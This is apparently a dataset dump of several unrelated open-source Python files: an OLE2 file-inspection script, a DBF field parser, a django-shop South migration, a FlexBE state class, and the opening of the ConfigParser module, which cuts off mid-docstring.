return self.metadata
#
# --------------------------------------------------------------------
# This script can be used to dump the directory of any OLE2 structured
# storage file.
if __name__ == "__main__":
import sys
# [PL] display quick usage info if launched from command-line
if len(sys.argv) <= 1:
print(__doc__)
print("""
Launched from command line, this script parses OLE files and prints info.
Usage: OleFileIO_PL.py [-d] [-c] <file> [file2 ...]
Options:
-d : debug mode (display a lot of debug information, for developers only)
-c : check all streams (for debugging purposes)
""")
sys.exit()
check_streams = False
for filename in sys.argv[1:]:
## try:
# OPTIONS:
if filename == '-d':
# option to switch debug mode on:
set_debug_mode(True)
continue
if filename == '-c':
# option to switch check streams mode on:
check_streams = True
continue
ole = OleFileIO(filename)#, raise_defects=DEFECT_INCORRECT)
print("-" * 68)
print(filename)
print("-" * 68)
ole.dumpdirectory()
for streamname in ole.listdir():
if streamname[-1][0] == "\005":
print(streamname, ": properties")
props = ole.getproperties(streamname, convert_time=True)
props = sorted(props.items())
for k, v in props:
#[PL]: avoid to display too large or binary values:
if isinstance(v, (basestring, bytes)):
if len(v) > 50:
v = v[:50]
if isinstance(v, bytes):
# quick and dirty binary check:
for c in (1,2,3,4,5,6,7,11,12,14,15,16,17,18,19,20,
21,22,23,24,25,26,27,28,29,30,31):
if c in bytearray(v):
v = '(binary data)'
break
print(" ", k, v)
if check_streams:
# Read all streams to check if there are errors:
print('\nChecking streams...')
for streamname in ole.listdir():
# print name using repr() to convert binary chars to \xNN:
print('-', repr('/'.join(streamname)),'-', end=' ')
st_type = ole.get_type(streamname)
if st_type == STGTY_STREAM:
print('size %d' % ole.get_size(streamname))
# just try to read stream in memory:
ole.openstream(streamname)
else:
print('NOT a stream : type=%d' % st_type)
print()
## for streamname in ole.listdir():
## # print name using repr() to convert binary chars to \xNN:
## print('-', repr('/'.join(streamname)),'-', end=' ')
## print(ole.getmtime(streamname))
## print()
print('Modification/Creation times of all directory entries:')
for entry in ole.direntries:
if entry is not None:
print('- %s: mtime=%s ctime=%s' % (entry.name,
entry.getmtime(), entry.getctime()))
print()
# parse and display metadata:
meta = ole.get_metadata()
meta.dump()
print()
#[PL] Test a few new methods:
root = ole.get_rootentry_name()
print('Root entry name: "%s"' % root)
if ole.exists('worddocument'):
print("This is a Word document.")
print("type of stream 'WordDocument':", ole.get_type('worddocument'))
print("size :", ole.get_size('worddocument'))
if ole.exists('macros/vba'):
print("This document may contain VBA macros.")
# print parsing issues:
print('\nNon-fatal issues raised during parsing:')
if ole.parsing_issues:
for exctype, msg in ole.parsing_issues:
print('- %s: %s' % (exctype.__name__, msg))
else:
print('None')
## except IOError as v:
## print("***", "cannot read", file, "-", v)
| mit |
awangga/csvfromdbf | dbfread/field_parser.py | 5 | 8156 | """
Parser for DBF fields.
"""
import sys
import datetime
import struct
from decimal import Decimal
from .memo import BinaryMemo
PY2 = sys.version_info[0] == 2
if PY2:
decode_text = unicode
else:
decode_text = str
class InvalidValue(bytes):
def __repr__(self):
text = bytes.__repr__(self)
if PY2:
# Make sure the string starts with "b'" in
# "InvalidValue(b'value here')".
text = 'b' + text
return 'InvalidValue({})'.format(text)
class FieldParser:
def __init__(self, table, memofile=None):
"""Create a new field parser
encoding is the character encoding to use when parsing
strings."""
self.table = table
self.dbversion = self.table.header.dbversion
self.encoding = table.encoding
self._lookup = self._create_lookup_table()
if memofile:
self.get_memo = memofile.__getitem__
else:
self.get_memo = lambda x: None
def _create_lookup_table(self):
"""Create a lookup table for field types."""
lookup = {}
for name in dir(self):
if name.startswith('parse'):
field_type = name[5:]
if len(field_type) == 1:
lookup[field_type] = getattr(self, name)
elif len(field_type) == 2:
# Hexadecimal ASCII code for field name.
# Example: parse2B() ('+' field)
field_type = chr(int(field_type, 16))
lookup[field_type] = getattr(self, name)
return lookup
def field_type_supported(self, field_type):
"""Checks if the field_type is supported by the parser
field_type should be a one-character string like 'C' and 'N'.
Returns a boolen which is True if the field type is supported.
"""
return field_type in self._lookup
def parse(self, field, data):
"""Parse field and return value"""
try:
func = self._lookup[field.type]
except KeyError:
raise ValueError('Unknown field type: {!r}'.format(field.type))
else:
return func(field, data)
def parse0(self, field, data):
"""Parse flags field and return as byte string"""
return data
def parseC(self, field, data):
"""Parse char field and return unicode string"""
return decode_text(data.rstrip(b'\0 '), self.encoding)
def parseD(self, field, data):
"""Parse date field and return datetime.date or None"""
try:
return datetime.date(int(data[:4]), int(data[4:6]), int(data[6:8]))
except ValueError:
if data.strip(b' 0') == b'':
# A record containing only spaces and/or zeros is
# a NULL value.
return None
else:
raise ValueError('invalid date {!r}'.format(data))
def parseF(self, field, data):
"""Parse float field and return float or None"""
if data.strip():
return float(data)
else:
return None
def parseI(self, field, data):
"""Parse integer or autoincrement field and return int."""
# Todo: is this 4 bytes on every platform?
return struct.unpack('<i', data)[0]
def parseL(self, field, data):
"""Parse logical field and return True, False or None"""
if data in b'TtYy':
return True
elif data in b'FfNn':
return False
elif data in b'? ':
return None
else:
# Todo: return something? (But that would be misleading!)
message = 'Illegal value for logical field: {!r}'
raise ValueError(message.format(data))
def _parse_memo_index(self, data):
if len(data) == 4:
return struct.unpack('<I', data)[0]
else:
try:
return int(data)
except ValueError:
if data.strip(b' \x00') == b'':
return 0
else:
raise ValueError(
'Memo index is not an integer: {!r}'.format(data))
def parseM(self, field, data):
"""Parse memo field (M, G, B or P)
Returns memo index (an integer), which can be used to look up
the corresponding memo in the memo file.
"""
memo = self.get_memo(self._parse_memo_index(data))
# Visual FoxPro allows binary data in memo fields.
# These should not be decoded as string.
if isinstance(memo, BinaryMemo):
return memo
else:
if memo is None:
return None
else:
return memo.decode(self.encoding)
def parseN(self, field, data):
"""Parse numeric field (N)
Returns int, float or None if the field is empty.
"""
try:
return int(data)
except ValueError:
if not data.strip():
return None
else:
# Account for , in numeric fields
return float(data.replace(b',', b'.'))
def parseO(self, field, data):
"""Parse long field (O) and return float."""
return struct.unpack('d', data)[0]
def parseT(self, field, data):
"""Parse time field (T)
Returns datetime.datetime or None"""
# Julian day (32-bit little endian)
# Milliseconds since midnight (32-bit little endian)
#
# "The Julian day or Julian day number (JDN) is the number of days
# that have elapsed since 12 noon Greenwich Mean Time (UT or TT) on
# Monday, January 1, 4713 BC in the proleptic Julian calendar
# 1. That day is counted as Julian day zero. The Julian day system
# was intended to provide astronomers with a single system of dates
# that could be used when working with different calendars and to
# unify different historical chronologies." - wikipedia.org
# Offset from julian days (used in the file) to proleptic Gregorian
# ordinals (used by the datetime module)
offset = 1721425 # Todo: will this work?
if data.strip():
# Note: if the day number is 0, we return None
# I've seen data where the day number is 0 and
# msec is 2 or 4. I think we can safely return None for those.
# (At least I hope so.)
#
day, msec = struct.unpack('<LL', data)
if day:
dt = datetime.datetime.fromordinal(day - offset)
delta = datetime.timedelta(seconds=msec/1000)
return dt + delta
else:
return None
else:
return None
def parseY(self, field, data):
"""Parse currency field (Y) and return decimal.Decimal.
The field is encoded as a 8-byte little endian integer
with 4 digits of precision."""
value = struct.unpack('<q', data)[0]
# Currency fields are stored with 4 points of precision
return Decimal(value) / 10000
def parseB(self, field, data):
"""Binary memo field or double precision floating point number
dBase uses B to represent a memo index (10 bytes), while
Visual FoxPro uses it to store a double precision floating
point number (8 bytes).
"""
if self.dbversion in [0x30, 0x31, 0x32]:
return struct.unpack('d', data)[0]
else:
return self.get_memo(self._parse_memo_index(data))
def parseG(self, field, data):
"""OLE Object stored in memofile.
The raw data is returned as a binary string."""
return self._get_memo(self._parse_memo_index(data))
def parseP(self, field, data):
"""Picture stored in memofile.
The raw data is returned as a binary string."""
return self._get_memo(self._parse_memo_index(data))
# Autoincrement field ('+')
parse2B = parseI
# Timestamp field ('@')
parse40 = parseT
| agpl-3.0 |
thenewguy/django-shop | shop/migrations/0003_auto__del_country__del_address__del_client.py | 16 | 13300 | # flake8: noqa
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'Country'
db.delete_table('shop_country')
# Deleting model 'Address'
db.delete_table('shop_address')
# Deleting model 'Client'
db.delete_table('shop_client')
def backwards(self, orm):
# Adding model 'Country'
db.create_table('shop_country', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal('shop', ['Country'])
# Adding model 'Address'
db.create_table('shop_address', (
('address2', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('address', self.gf('django.db.models.fields.CharField')(max_length=255)),
('is_shipping', self.gf('django.db.models.fields.BooleanField')(default=False)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('city', self.gf('django.db.models.fields.CharField')(max_length=20)),
('country', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shop.Country'])),
('client', self.gf('django.db.models.fields.related.ForeignKey')(related_name='addresses', to=orm['shop.Client'])),
('state', self.gf('django.db.models.fields.CharField')(max_length=255)),
('is_billing', self.gf('django.db.models.fields.BooleanField')(default=False)),
('zip_code', self.gf('django.db.models.fields.CharField')(max_length=20)),
))
db.send_create_signal('shop', ['Address'])
# Adding model 'Client'
db.create_table('shop_client', (
('date_of_birth', self.gf('django.db.models.fields.DateField')(null=True, blank=True)),
('user', self.gf('django.db.models.fields.related.OneToOneField')(related_name='client', unique=True, to=orm['auth.User'])),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
))
db.send_create_signal('shop', ['Client'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shop.cart': {
'Meta': {'object_name': 'Cart'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'shop.cartitem': {
'Meta': {'object_name': 'CartItem'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['shop.Cart']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.Product']"}),
'quantity': ('django.db.models.fields.IntegerField', [], {})
},
'shop.extraorderitempricefield': {
'Meta': {'object_name': 'ExtraOrderItemPriceField'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order_item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.OrderItem']"}),
'value': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'shop.extraorderpricefield': {
'Meta': {'object_name': 'ExtraOrderPriceField'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.Order']"}),
'value': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'shop.order': {
'Meta': {'object_name': 'Order'},
'billing_address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_address2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_country': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'billing_zip_code': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'order_subtotal': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'order_total': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'payment_method': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_address2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_country': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'shipping_zip_code': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'shop.orderextrainfo': {
'Meta': {'object_name': 'OrderExtraInfo'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'extra_info'", 'to': "orm['shop.Order']"}),
'text': ('django.db.models.fields.TextField', [], {})
},
'shop.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_subtotal': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'line_total': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['shop.Order']"}),
'product_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'product_reference': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'quantity': ('django.db.models.fields.IntegerField', [], {}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'shop.orderpayment': {
'Meta': {'object_name': 'OrderPayment'},
'amount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.Order']"}),
'payment_method': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'transaction_id': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'shop.product': {
'Meta': {'object_name': 'Product'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_shop.product_set'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
}
}
complete_apps = ['shop']
| bsd-3-clause |
team-vigir/flexbe_behavior_engine | flexbe_core/src/flexbe_core/core/state.py | 1 | 1722 | #!/usr/bin/env python
from flexbe_core.core.exceptions import StateError
def _remove_duplicates(input_list):
output_list = list()
for entry in input_list:
if entry not in output_list:
output_list.append(entry)
return output_list
class State(object):
def __init__(self, *args, **kwargs):
self._outcomes = _remove_duplicates(kwargs.get('outcomes', []))
io_keys = kwargs.get('io_keys', [])
self._input_keys = _remove_duplicates(kwargs.get('input_keys', []) + io_keys)
self._output_keys = _remove_duplicates(kwargs.get('output_keys', []) + io_keys)
# properties of instances of a state machine
self._name = None
self._parent = None
def execute(self, userdata):
pass
def sleep(self):
pass
@property
def sleep_duration(self):
return 0.
@property
def outcomes(self):
return self._outcomes
@property
def input_keys(self):
return self._input_keys
@property
def output_keys(self):
return self._output_keys
# instance properties
@property
def name(self):
return self._name
def set_name(self, value):
if self._name is not None:
raise StateError("Cannot change the name of a state!")
else:
self._name = value
@property
def parent(self):
return self._parent
def set_parent(self, value):
if self._parent is not None:
raise StateError("Cannot change the parent of a state!")
else:
self._parent = value
@property
def path(self):
return "" if self.parent is None else self.parent.path + "/" + self.name
| bsd-3-clause |
robovm/robovm-studio | python/lib/Lib/ConfigParser.py | 105 | 23116 | """Configuration file parser.
A setup file consists of sections, lead by a "[section]" header,
and followed by "name: value" entries, with continuations and such in
the style of RFC 822.
The option values can contain format strings which refer to other values in
the same section, or values in a special [DEFAULT] section.
For example:
something: %(dir)s/whatever
would resolve the "%(dir)s" to the value of dir. All reference
expansions are done late, on demand.
Intrinsic defaults can be specified by passing them into the
ConfigParser constructor as a dictionary.
class:
ConfigParser -- responsible for parsing a list of
configuration files, and managing the parsed database.
methods:
__init__(defaults=None)
create the parser and specify a dictionary of intrinsic defaults. The
keys must be strings, the values must be appropriate for %()s string
interpolation. Note that `__name__' is always an intrinsic default;
its value is the section's name.
sections()
return all the configuration section names, sans DEFAULT
has_section(section)
return whether the given section exists
has_option(section, option)
return whether the given option exists in the given section
options(section)
return list of configuration options for the named section
read(filenames)
read and parse the list of named configuration files, given by
name. A single filename is also allowed. Non-existing files
are ignored. Return list of successfully read files.
readfp(fp, filename=None)
read and parse one configuration file, given as a file object.
The filename defaults to fp.name; it is only used in error
messages (if fp has no `name' attribute, the string `<???>' is used).
get(section, option, raw=False, vars=None)
return a string value for the named option. All % interpolations are
expanded in the return values, based on the defaults passed into the
constructor and the DEFAULT section. Additional substitutions may be
provided using the `vars' argument, which must be a dictionary whose
contents override any pre-existing defaults.
getint(section, options)
like get(), but convert value to an integer
getfloat(section, options)
like get(), but convert value to a float
getboolean(section, options)
like get(), but convert value to a boolean (currently case
insensitively defined as 0, false, no, off for False, and 1, true,
yes, on for True). Returns False or True.
items(section, raw=False, vars=None)
return a list of tuples with (name, value) for each option
in the section.
remove_section(section)
remove the given file section and all its options
remove_option(section, option)
remove the given option from the given section
set(section, option, value)
set the given option
write(fp)
write the configuration state in .ini format
"""
import re
__all__ = ["NoSectionError", "DuplicateSectionError", "NoOptionError",
"InterpolationError", "InterpolationDepthError",
"InterpolationSyntaxError", "ParsingError",
"MissingSectionHeaderError",
"ConfigParser", "SafeConfigParser", "RawConfigParser",
"DEFAULTSECT", "MAX_INTERPOLATION_DEPTH"]
DEFAULTSECT = "DEFAULT"
MAX_INTERPOLATION_DEPTH = 10
# exception classes
class Error(Exception):
"""Base class for ConfigParser exceptions."""
def __init__(self, msg=''):
self.message = msg
Exception.__init__(self, msg)
def __repr__(self):
return self.message
__str__ = __repr__
class NoSectionError(Error):
"""Raised when no section matches a requested option."""
def __init__(self, section):
Error.__init__(self, 'No section: %r' % (section,))
self.section = section
class DuplicateSectionError(Error):
"""Raised when a section is multiply-created."""
def __init__(self, section):
Error.__init__(self, "Section %r already exists" % section)
self.section = section
class NoOptionError(Error):
"""A requested option was not found."""
def __init__(self, option, section):
Error.__init__(self, "No option %r in section: %r" %
(option, section))
self.option = option
self.section = section
class InterpolationError(Error):
"""Base class for interpolation-related exceptions."""
def __init__(self, option, section, msg):
Error.__init__(self, msg)
self.option = option
self.section = section
class InterpolationMissingOptionError(InterpolationError):
"""A string substitution required a setting which was not available."""
def __init__(self, option, section, rawval, reference):
msg = ("Bad value substitution:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\tkey : %s\n"
"\trawval : %s\n"
% (section, option, reference, rawval))
InterpolationError.__init__(self, option, section, msg)
self.reference = reference
class InterpolationSyntaxError(InterpolationError):
"""Raised when the source text into which substitutions are made
does not conform to the required syntax."""
class InterpolationDepthError(InterpolationError):
"""Raised when substitutions are nested too deeply."""
def __init__(self, option, section, rawval):
msg = ("Value interpolation too deeply recursive:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\trawval : %s\n"
% (section, option, rawval))
InterpolationError.__init__(self, option, section, msg)
class ParsingError(Error):
"""Raised when a configuration file does not follow legal syntax."""
def __init__(self, filename):
Error.__init__(self, 'File contains parsing errors: %s' % filename)
self.filename = filename
self.errors = []
def append(self, lineno, line):
self.errors.append((lineno, line))
self.message += '\n\t[line %2d]: %s' % (lineno, line)
class MissingSectionHeaderError(ParsingError):
"""Raised when a key-value pair is found before any section header."""
def __init__(self, filename, lineno, line):
Error.__init__(
self,
'File contains no section headers.\nfile: %s, line: %d\n%r' %
(filename, lineno, line))
self.filename = filename
self.lineno = lineno
self.line = line
class RawConfigParser:
def __init__(self, defaults=None):
self._sections = {}
self._defaults = {}
if defaults:
for key, value in defaults.items():
self._defaults[self.optionxform(key)] = value
def defaults(self):
return self._defaults
def sections(self):
"""Return a list of section names, excluding [DEFAULT]"""
# self._sections will never have [DEFAULT] in it
return self._sections.keys()
def add_section(self, section):
"""Create a new section in the configuration.
Raise DuplicateSectionError if a section by the specified name
already exists.
"""
if section in self._sections:
raise DuplicateSectionError(section)
self._sections[section] = {}
def has_section(self, section):
"""Indicate whether the named section is present in the configuration.
The DEFAULT section is not acknowledged.
"""
return section in self._sections
def options(self, section):
"""Return a list of option names for the given section name."""
try:
opts = self._sections[section].copy()
except KeyError:
raise NoSectionError(section)
opts.update(self._defaults)
if '__name__' in opts:
del opts['__name__']
return opts.keys()
def read(self, filenames):
"""Read and parse a filename or a list of filenames.
Files that cannot be opened are silently ignored; this is
designed so that you can specify a list of potential
configuration file locations (e.g. current directory, user's
home directory, systemwide directory), and all existing
configuration files in the list will be read. A single
filename may also be given.
Return list of successfully read files.
"""
if isinstance(filenames, basestring):
filenames = [filenames]
read_ok = []
for filename in filenames:
try:
fp = open(filename)
except IOError:
continue
self._read(fp, filename)
fp.close()
read_ok.append(filename)
return read_ok
def readfp(self, fp, filename=None):
"""Like read() but the argument must be a file-like object.
The `fp' argument must have a `readline' method. Optional
second argument is the `filename', which if not given, is
taken from fp.name. If fp has no `name' attribute, `<???>' is
used.
"""
if filename is None:
try:
filename = fp.name
except AttributeError:
filename = '<???>'
self._read(fp, filename)
def get(self, section, option):
opt = self.optionxform(option)
if section not in self._sections:
if section != DEFAULTSECT:
raise NoSectionError(section)
if opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
elif opt in self._sections[section]:
return self._sections[section][opt]
elif opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
def items(self, section):
try:
d2 = self._sections[section]
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
d2 = {}
d = self._defaults.copy()
d.update(d2)
if "__name__" in d:
del d["__name__"]
return d.items()
def _get(self, section, conv, option):
return conv(self.get(section, option))
def getint(self, section, option):
return self._get(section, int, option)
def getfloat(self, section, option):
return self._get(section, float, option)
_boolean_states = {'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False}
def getboolean(self, section, option):
v = self.get(section, option)
if v.lower() not in self._boolean_states:
raise ValueError, 'Not a boolean: %s' % v
return self._boolean_states[v.lower()]
def optionxform(self, optionstr):
return optionstr.lower()
def has_option(self, section, option):
"""Check for the existence of a given option in a given section."""
if not section or section == DEFAULTSECT:
option = self.optionxform(option)
return option in self._defaults
elif section not in self._sections:
return False
else:
option = self.optionxform(option)
return (option in self._sections[section]
or option in self._defaults)
def set(self, section, option, value):
"""Set an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
sectdict[self.optionxform(option)] = value
def write(self, fp):
"""Write an .ini-format representation of the configuration state."""
if self._defaults:
fp.write("[%s]\n" % DEFAULTSECT)
for (key, value) in self._defaults.items():
fp.write("%s = %s\n" % (key, str(value).replace('\n', '\n\t')))
fp.write("\n")
for section in self._sections:
fp.write("[%s]\n" % section)
for (key, value) in self._sections[section].items():
if key != "__name__":
fp.write("%s = %s\n" %
(key, str(value).replace('\n', '\n\t')))
fp.write("\n")
def remove_option(self, section, option):
"""Remove an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
option = self.optionxform(option)
existed = option in sectdict
if existed:
del sectdict[option]
return existed
def remove_section(self, section):
"""Remove a file section."""
existed = section in self._sections
if existed:
del self._sections[section]
return existed
#
# Regular expressions for parsing section headers and options.
#
SECTCRE = re.compile(
r'\[' # [
r'(?P<header>[^]]+)' # very permissive!
r'\]' # ]
)
OPTCRE = re.compile(
r'(?P<option>[^:=\s][^:=]*)' # very permissive!
r'\s*(?P<vi>[:=])\s*' # any number of space/tab,
# followed by separator
# (either : or =), followed
# by any # space/tab
r'(?P<value>.*)$' # everything up to eol
)
def _read(self, fp, fpname):
"""Parse a sectioned setup file.
The sections in setup file contains a title line at the top,
indicated by a name in square brackets (`[]'), plus key/value
options lines, indicated by `name: value' format lines.
Continuations are represented by an embedded newline then
leading whitespace. Blank lines, lines beginning with a '#',
and just about everything else are ignored.
"""
cursect = None # None, or a dictionary
optname = None
lineno = 0
e = None # None, or an exception
while True:
line = fp.readline()
if not line:
break
lineno = lineno + 1
# comment or blank line?
if line.strip() == '' or line[0] in '#;':
continue
if line.split(None, 1)[0].lower() == 'rem' and line[0] in "rR":
# no leading whitespace
continue
# continuation line?
if line[0].isspace() and cursect is not None and optname:
value = line.strip()
if value:
cursect[optname] = "%s\n%s" % (cursect[optname], value)
# a section header or option header?
else:
# is it a section header?
mo = self.SECTCRE.match(line)
if mo:
sectname = mo.group('header')
if sectname in self._sections:
cursect = self._sections[sectname]
elif sectname == DEFAULTSECT:
cursect = self._defaults
else:
cursect = {'__name__': sectname}
self._sections[sectname] = cursect
# So sections can't start with a continuation line
optname = None
# no section header in the file?
elif cursect is None:
raise MissingSectionHeaderError(fpname, lineno, line)
# an option line?
else:
mo = self.OPTCRE.match(line)
if mo:
optname, vi, optval = mo.group('option', 'vi', 'value')
if vi in ('=', ':') and ';' in optval:
# ';' is a comment delimiter only if it follows
# a spacing character
pos = optval.find(';')
if pos != -1 and optval[pos-1].isspace():
optval = optval[:pos]
optval = optval.strip()
# allow empty values
if optval == '""':
optval = ''
optname = self.optionxform(optname.rstrip())
cursect[optname] = optval
else:
# a non-fatal parsing error occurred. set up the
# exception but keep going. the exception will be
# raised at the end of the file and will contain a
# list of all bogus lines
if not e:
e = ParsingError(fpname)
e.append(lineno, repr(line))
# if any parsing errors occurred, raise an exception
if e:
raise e
class ConfigParser(RawConfigParser):
def get(self, section, option, raw=False, vars=None):
"""Get an option value for a given section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
`vars' argument, which must be a dictionary whose contents overrides
any pre-existing defaults.
